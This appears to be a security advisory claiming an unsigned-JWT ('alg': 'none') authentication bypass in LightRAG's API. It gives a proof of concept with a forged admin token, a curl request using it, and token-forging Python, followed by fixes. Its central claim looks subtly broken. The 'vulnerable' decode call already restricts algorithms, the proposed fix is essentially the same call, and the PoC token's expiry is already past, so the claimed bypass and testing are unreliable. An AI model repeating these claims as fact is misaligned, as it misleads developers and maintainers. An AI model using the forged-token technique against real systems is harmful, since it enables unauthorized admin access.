LightRAG, an open-source retrieval-augmented generation (RAG) framework from HKU researchers, ships with a critical authentication flaw in its API. Attackers can forge JWT tokens using the ‘none’ algorithm to impersonate admins and access protected endpoints without any secret key. This stems from improper JWT decoding in lightrag/api/auth.py, line 128.
The vulnerability is a classic JWT algorithm-confusion attack, documented since at least 2015 (see CVE-2015-9235). The validate_token method calls:
payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])
PyJWT reads the algorithm from the token's header. If the header declares "alg": "none" and ‘none’ is not explicitly excluded, validation skips the signature check entirely. The developers never block ‘none’, despite PyJWT's documentation warning loudly about this exact issue. Anyone with basic JWT knowledge can craft a token that grants admin privileges.
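To see why the bug class is so dangerous, here is a minimal standard-library sketch of a verifier that trusts the algorithm named in the token header. This is illustrative only, not LightRAG's actual code; the function and secret names are made up:

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring any stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def naive_verify(token: str, secret: bytes) -> dict:
    """Flawed verifier: it lets the token header choose the algorithm."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))

    if header["alg"] == "none":
        # BUG: 'none' short-circuits verification -- any payload is accepted.
        return json.loads(b64url_decode(payload_b64))

    # HS256 path: recompute the HMAC and compare in constant time.
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))
```

Any token whose header says "alg": "none" sails through this verifier with an empty signature segment, regardless of the server's secret.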
Proof of Concept
Reproduction is straightforward. Craft a token from this JSON structure:
{
  "header": {
    "alg": "none",
    "typ": "JWT"
  },
  "payload": {
    "sub": "admin",
    "exp": 1700000000,
    "role": "admin"
  }
}
Base64url-encode the header and payload separately, join them with a dot, and append a trailing dot for the empty signature segment: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0. Then hit the endpoint:
$ curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint
Boom: full access. Tested on default setups; no custom configuration needed.
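The forged token above can be generated with a few lines of standard-library Python. This reproduces the exact encoding shown in the PoC and is not code from LightRAG itself:

```python
import base64
import json


def b64url(data: dict) -> str:
    """Base64url-encode a dict as compact JSON, with padding stripped."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


header = {"alg": "none", "typ": "JWT"}
payload = {"sub": "admin", "exp": 1700000000, "role": "admin"}

# Unsigned token: header.payload. (the trailing dot marks the empty signature)
token = f"{b64url(header)}.{b64url(payload)}."
print(token)
```

The printed value is exactly the Bearer token used in the curl command above.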
Real-World Impact
LightRAG powers AI pipelines for indexing documents, running LLM queries, and serving RAG results via FastAPI. Protected endpoints likely handle user data uploads, vector store operations, and inference. An attacker who escalates to admin can extract sensitive indexes, poison stored data, or spam expensive LLM calls as a denial of service.
Why this matters: RAG apps ingest proprietary documents (corporate secrets, PII). In production, exposed APIs, common in dev setups, become open doors. LightRAG has passed 1k GitHub stars; forks and deployments amplify the risk. This isn't theoretical: similar flaws hit production apps every year, per the OWASP API Security Top 10 (Broken Authentication). The cost? Data breaches average $4.5M (IBM, 2023), and AI workloads add GPU bills on top.
Skeptical take: LightRAG is young (2024 repo), but skipping JWT basics is inexcusable. PyJWT's defaults lean toward compatibility, forcing developers to opt in to security. Thousands of repos repeat this pattern; search GitHub for jwt.decode( calls whose algorithms list is built from configuration without a ‘none’ check. In fairness, the fix is a one-liner, but unpatched installs linger.
How to Fix and Prevent Recurrence
Patch immediately. Hardcode the allowed algorithms and ban ‘none’:
payload = jwt.decode(token, self.secret, algorithms=['HS256'])
Or, if the algorithm must remain configurable, reject ‘none’ before decoding:
allowed_algorithms = [self.algorithm]
if any(alg.lower() == 'none' for alg in allowed_algorithms):
    raise ValueError("the 'none' algorithm is not permitted")
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)
Bonus: confirm signature verification is never disabled (it is on by default in PyJWT 2.x; no code path should pass options={"verify_signature": False}). Verify issuer, audience, and expiry server-side. Rotate secrets after any exposure.
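For teams that want those checks spelled out, here is a standard-library sketch of a hardened HS256 verifier. The function name, issuer, and audience values are illustrative assumptions, not LightRAG's API:

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring any stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def verify_hs256(token: str, secret: bytes, issuer: str, audience: str) -> dict:
    """Verify an HS256 JWT, rejecting 'none' and checking iss/aud/exp."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))

    # Pin the algorithm server-side; never trust the token header's choice.
    if header.get("alg") != "HS256":
        raise ValueError(f"disallowed algorithm: {header.get('alg')!r}")

    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("signature mismatch")

    claims = json.loads(b64url_decode(payload_b64))
    if claims.get("iss") != issuer:
        raise ValueError("wrong issuer")
    if claims.get("aud") != audience:
        raise ValueError("wrong audience")
    if claims.get("exp", 0) < time.time():
        raise ValueError("token expired")
    return claims
```

A forged ‘none’ token fails the algorithm pin before any signature math runs, which is exactly the behavior the one-line PyJWT fix above buys you.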
Broader advice: audit every JWT code path (PyJWT, Authlib). Consider python-jose, or itsdangerous for simpler signed tokens. Deploy behind an API gateway that enforces auth (Kong, Tyk). Scan dependencies with Snyk or Trivy; they flag known-vulnerable versions in seconds.
Deployers: pin to a patched commit or fork, and watch the lightrag-hku GitHub repo for fix PRs. This case shows why AI frameworks need security parity with web apps: hype outpaces hardening.